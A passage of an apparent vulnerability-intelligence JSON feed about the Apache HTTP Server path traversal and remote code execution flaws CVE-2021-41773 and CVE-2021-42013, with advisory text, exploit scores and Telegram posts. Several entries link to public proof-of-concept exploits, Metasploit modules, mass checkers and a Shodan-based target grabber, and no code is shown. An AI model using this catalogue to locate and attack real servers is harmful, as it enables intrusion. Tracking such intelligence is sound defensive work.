2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nFIRST-EPSS: 0.973400000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-05T00:51:47.000000Z"}, {"uuid": "0c8fd2d5-bdf5-4741-bdcb-4ff174a65167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/ctinow/42637", "content": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)\n\nhttps://ift.tt/3FoNlyG", "creation_timestamp": "2021-11-19T02:06:06.000000Z"}, {"uuid": "9261c613-63fe-4d16-b773-c37886dcfd3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/4ImoiQUCabjN1t-huCBAkrJRDMT3y_s40aRtK_v7NOw3yjI", "content": "", "creation_timestamp": "2021-11-15T11:35:44.000000Z"}, {"uuid": "173bc897-4f74-4756-bae1-8f59a8409c2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/arpsyndicate/1593", "content": "#ExploitObserverAlert\n\nCVE-2021-41773\n\nDESCRIPTION: Exploit Observer has 341 entries related to CVE-2021-41773. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\nFIRST-EPSS: 0.974240000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-10T01:32:00.000000Z"}, {"uuid": "2a05c972-343a-445a-87e3-f6140d95aacc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/arpsyndicate/294", "content": "#ExploitObserverAlert\n\nCVE-2021-41773\n\nDESCRIPTION: Exploit Observer has 338 entries related to CVE-2021-41773. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\nFIRST-EPSS: 0.974240000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-11-20T15:38:47.000000Z"}, {"uuid": "ec9d4307-5743-4c5e-a7e8-3674ca335202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/wjgDtksWls9V1MNAoyuEJUSghGZx1yvMU0aJMIJaKbGDXvk", "content": "", "creation_timestamp": "2025-02-03T04:00:06.000000Z"}, {"uuid": "c13874de-8cbd-468d-9fec-6dc330ab5774", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/3Hw0ti8HK8QOqtOY2rsuqDdNwUtzE1sTstZVcrt4AbtXgI8", "content": "", "creation_timestamp": "2025-04-14T23:00:06.000000Z"}, {"uuid": "727140b5-8c71-47da-823a-486fbe5ecce8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/YBrr9bnrMsHvjVMlNhE_R_T9Bu1Hec2ynwQC5xZi-avV8gw", "content": "", "creation_timestamp": "2025-03-20T04:00:07.000000Z"}, {"uuid": "9d76ba27-0f4d-423a-84c5-12d878ecb2da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/_YXcfdgTkBdEb3tZAn-Z2dueEzzZzJdwT_cvOAzfR__gtTo", "content": "", "creation_timestamp": "2025-03-11T16:00:08.000000Z"}, {"uuid": "b82177d8-4dc8-4b8f-ba2e-f7f7195214df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/ashaburroyah313/925", "content": "CVE-2021-41773: What it is and how to fix it | Vulcan Cyber\nhttps://vulcan.io/blog/apache-http-server-cve-2021-41773/", "creation_timestamp": "2024-04-11T21:18:25.000000Z"}, {"uuid": "b8ed053e-a2e4-4549-a3a3-804df458e36b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/PPRulSqy2P4C7HpvstfvQ-zRaVShyT0ot3LuJQSK8PZP9f3a", "content": "", "creation_timestamp": "2022-05-14T22:40:54.000000Z"}, {"uuid": "b31f77b6-6fe9-421f-b085-ddf1c3393a84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/BABATATASASA/6884", "content": "CVE-2021-41773: What it is and how to fix it | Vulcan Cyber\nhttps://vulcan.io/blog/apache-http-server-cve-2021-41773/", "creation_timestamp": "2024-04-11T21:18:22.000000Z"}, {"uuid": "3641af33-e0dd-4de2-84ca-a9e82338f6f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hanleaking/273", "content": "", "creation_timestamp": "2023-12-08T11:18:24.000000Z"}, {"uuid": "cb1828a4-c27f-431d-bf68-5d0c63aaf461", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/tmsilent/944", "content": "Sedikit menjelaskan Teknik Meretas Apache Server 2.4 untuk bisa mendapatkan akses shell.\nMenggunakan \n\n#nmap\nt.me/tmsilent", "creation_timestamp": "2021-11-06T12:45:41.000000Z"}, {"uuid": "506f18d9-d6e9-4f16-8262-f54a3a7dbaf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/vC0bavZ0AxHDJsPw0YfOZ4H-hePupJtZK38ZMjY-H3HSPzs", "content": "", "creation_timestamp": "2022-09-25T12:34:04.000000Z"}, {"uuid": "990ab307-321a-4053-9d0f-f0bfd89330b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/TOmFjew0Kp3Ipuq7fSZ6lVbqDXlDmeo8XHcbYkSNAbeA9g", "content": "", "creation_timestamp": "2021-10-23T13:00:40.000000Z"}, {"uuid": "f37135ba-08dd-403f-981f-42776dd3b570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/sCCdzbAMUD6LCcGsM_mt0n7nzxs4sGd9i1UAheak_405l9E", "content": "", "creation_timestamp": "2022-09-22T08:20:11.000000Z"}, {"uuid": "4cd4e46c-940c-43de-b73e-527bafc99b28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/276", "content": "ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server #poc exploit\nhttps://github.com/bhdresh/CVE-2021-33766\n\n#poc CVE-2021-37980 : Inappropriate implementation in Sandbox (windows only)\nhttps://github.com/ZeusBox/CVE-2021-37980\n\nMy take on CVE-2021-30858 #poc for ps4 8.xx It's just a POC\nhttps://github.com/PeterMxx/ps4_8.00_vuln_poc\n\nA simple Python proof of concept for CVE-2021-38295\nhttps://github.com/ProfessionallyEvil/CVE-2021-38295-PoC\n\napache httpd path traversal checker(CVE-2021-41773 / CVE-2021-42013)\nhttps://github.com/theLSA/apache-httpd-path-traversal-checker", "creation_timestamp": "2021-10-15T12:57:52.000000Z"}, {"uuid": "13a8fffe-4dcb-4164-8e6b-6bad1ed93f9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/248", "content": "#Exploitation of CVE-2021-41773 a Directory Traversal in Apache 2.4.49\nhttps://github.com/RyouYoo/CVE-2021-41773\n\n#poc for CVE-2021-41773 with docker to demonstrate\nhttps://github.com/habibiefaried/CVE-2021-41773-PoC\n\n#poc CVE-2021-41773\nhttps://github.com/trungnd51/CVE-2021-41773\n\nCVE-2021-41773 nse\nhttps://github.com/creadpag/cve-2021-41773-nse", "creation_timestamp": "2021-10-06T09:07:13.000000Z"}, {"uuid": "3ec45825-7cf4-4a1f-81f2-00fd91a4c119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/hacker_trick/394", "content": "Some docker images to play with #CVE-2021-41773 and #CVE-2021-42013\nhttps://github.com/Hydragyrum/CVE-2021-41773-Playground\n\n#CVE-2021-42663 HTML Injection vulnerability in the Online event booking and reservation system\nhttps://github.com/TheHackingRabbi/CVE-2021-42663", "creation_timestamp": "2021-11-05T12:22:44.000000Z"}, {"uuid": "83deeefa-8645-43bf-ac6f-45601cbc3801", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/367", "content": "A framework for bug hunting or pentesting targeting websites that have #CVE-2021-41773 Vulnerability in public\nhttps://github.com/HightechSec/scarce-apache2\n\n#poc for the #CVE-2021-20837 RCE in MovableType\nhttps://github.com/ghost-nemesis/cve-2021-20837-poc", "creation_timestamp": "2021-10-31T14:29:50.000000Z"}, {"uuid": "ba74578e-4a00-4c5f-837a-168173aa0cc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/271", "content": "Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Checker\n\nhttps://github.com/im-hanzou/apachrot", "creation_timestamp": "2021-10-12T10:08:59.000000Z"}, {"uuid": "c95f67df-e7b8-472c-8fbd-f9d845630596", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/269", "content": "Metasploit modules (scanner and exploit) for the CVE-2021-41773 and CVE-2021-42013 (Path Traversal in Apache 2.4.49/2.4.50)\nhttps://github.com/Zeop-CyberSec/apache_normalize_path/commits/master\n\nApachuk - CVE-2021-41773 Grabber with Shodan\nhttps://github.com/apapedulimu/Apachuk", "creation_timestamp": "2021-10-11T21:00:09.000000Z"}, {"uuid": "79f885dc-d1bd-458e-96d4-d0537094cb2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/267", "content": "#CVE-2021-41773 playground\nApache HTTP Server 2.4.49\n\nhttps://github.com/blasty/CVE-2021-41773", "creation_timestamp": "2021-10-09T19:41:16.000000Z"}, {"uuid": "2e092313-fd5f-490c-bb1a-2882bb5f1a90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/254", "content": "A framework for bug hunting or pentesting targeting websites that have CVE-2021-41773 Vulnerability in public\nhttps://github.com/HightechSec/scarce-apache2\n\nCVE-2021-26084 - Confluence Server Webwork OGNL injection\nhttps://github.com/oxctdev/CVE-2021-26084", "creation_timestamp": "2021-10-07T09:20:05.000000Z"}, {"uuid": "01273f7c-46db-4a76-a749-787e6cf867da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/Or3tvPrt2uuJ71AblKfPL4-tzOORWdJ13C5jjpneiiL-jw", "content": "", "creation_timestamp": "2021-10-13T04:56:13.000000Z"}, {"uuid": "a3df0047-eccf-408f-ae95-9bb49c37af26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/auraxchan/28176", "content": "Apache has issued urgent security patches to address 2 new security vulnerabilities\u2014including a zero-day path traversal and file disclosure flaw (CVE-2021-41773) in HTTP servers that it said is being actively exploited in the wild.\n https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html\n\n@cyberagents", "creation_timestamp": "2021-10-05T17:23:53.000000Z"}, {"uuid": "a1927be4-6b83-48df-b851-0e28a4bbd941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/9FIdJKEbN3A2Hu28AOXoH9ytWhGmBBXaQOWWq4P3_3pGkQ", "content": "", "creation_timestamp": "2021-10-11T16:34:01.000000Z"}, {"uuid": "702f17cb-a8ab-4617-bdc2-b70bfdff6e69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/true_secator/2391", "content": "\u0411\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u0440\u0443 \u043d\u0435\u0434\u0435\u043b\u044c \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0430\u0447\u0430\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-41773 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u043d\u0430 HTTP-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Apache, \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430.\n \n\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u043e\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (BSI) \u0413\u0435\u0440\u043c\u0430\u043d\u0438\u0438 \u0438 Cisco \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u043e \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 PoC \u0434\u043b\u044f \u043d\u043e\u0432\u043e\u0439 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-40438.\n \n\u041e\u0448\u0438\u0431\u043a\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043f\u043e\u0434\u0434\u0435\u043b\u043a\u0443 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 (SSRF), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043f\u0440\u043e\u0442\u0438\u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 httpd, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u043c\u043e\u0434\u0443\u043b\u044c mod_proxy.\n \n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u0437\u0430\u043f\u0440\u043e\u0441, \u0447\u0442\u043e\u0431\u044b \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440, \u0442\u0435\u043c \u0441\u0430\u043c\u044b\u043c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0442\u044c \u0441\u0435\u043a\u0440\u0435\u0442\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u043b\u0438 \u043a\u043b\u044e\u0447\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b) \u0438\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0440\u0443\u0433\u0438\u043c \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c (\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043c\u0435\u043d\u0435\u0435 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u043c\u0438, \u0447\u0435\u043c \u0432\u043d\u0435\u0448\u043d\u0438\u0435).\n \n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0433\u0440\u0443\u043f\u043f\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Apache HTTP \u043f\u0440\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0434\u0440\u0443\u0433\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041e\u043d\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u044e 2.4.48 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0438 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c \u0432\u0435\u0440\u0441\u0438\u0438 2.4.49. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438 \u044d\u0442\u043e\u043c, \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0435\u0434\u0443\u0442 \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 httpd (\u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b AWS, Microsoft Azure \u0438 Google Cloud Platform \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044e\u0442 \u0437\u0430\u0449\u0438\u0442\u0443 \u043e\u0442 \u0442\u0430\u043a\u0438\u0445 \u0430\u0442\u0430\u043a).\n \nCisco \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 Prime Collaboration Provisioning, Security Manager, Expressway \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u0438\u0434\u0435\u043e\u0441\u0432\u044f\u0437\u0438 TelePresence \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f 5 \u043e\u0448\u0438\u0431\u043e\u043a  HTTP-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Apache.\n \n\u0421 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, BSI \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e \u0441\u0442\u0430\u0432\u0448\u0435\u043c \u0438\u043c \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043a\u043e\u0433\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0439\u0441\u044f \u0434\u044b\u0440\u043e\u0439, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0445\u044d\u0448-\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438\u0437 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b.\n \n\u0423\u0432\u0435\u0440\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u0434\u0445\u043e\u0434\u0435 \u0438 \u043d\u043e\u0432\u044b\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u044b, \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u043a\u0430 \u0435\u0449\u0435 \u043d\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0448\u0438\u0440\u043e\u043a\u043e\u0439 \u043f\u0443\u0431\u043b\u0438\u043a\u0435.", "creation_timestamp": "2021-11-30T18:04:00.000000Z"}, {"uuid": "98c57b93-5642-4008-a0a0-075b8f121098", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/true_secator/2184", "content": "\u200b\u200bApache Software Foundation \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0432\u0435\u0440\u0441\u0438\u044e 2.4.50 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 HTTP \u0434\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f 2 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043e\u0448\u0438\u0431\u043a\u0430\u043c\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 HTTP-\u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u0411\u0430\u0433\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n \nHTTP-\u0441\u0435\u0440\u0432\u0435\u0440 Apache - \u044d\u0442\u043e \u043a\u0440\u043e\u0441\u0441\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u044b\u0439 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0447\u0440\u0435\u0437\u0432\u044b\u0447\u0430\u0439\u043d\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u0435\u043d \u0441\u0440\u0435\u0434\u0438 